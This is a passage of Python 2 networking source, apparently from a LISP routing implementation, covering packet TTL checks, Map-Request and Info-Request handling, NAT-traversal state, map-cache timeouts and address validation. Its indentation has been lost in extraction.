checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
if (nat_info and len(lisp_sockets) == 4):
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest,
nat_info, packet)
return
#endif
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname in private-rloc in Info-Reply. Encode it as
# an AFI=17 distinguished-name.
#
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reasssigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Check acitvity timers for encapsulation entries only.
#
if (mc.action == LISP_NO_ACTION):
now = lisp_get_timestamp()
if (mc.last_refresh_time + mc.map_cache_ttl > now):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
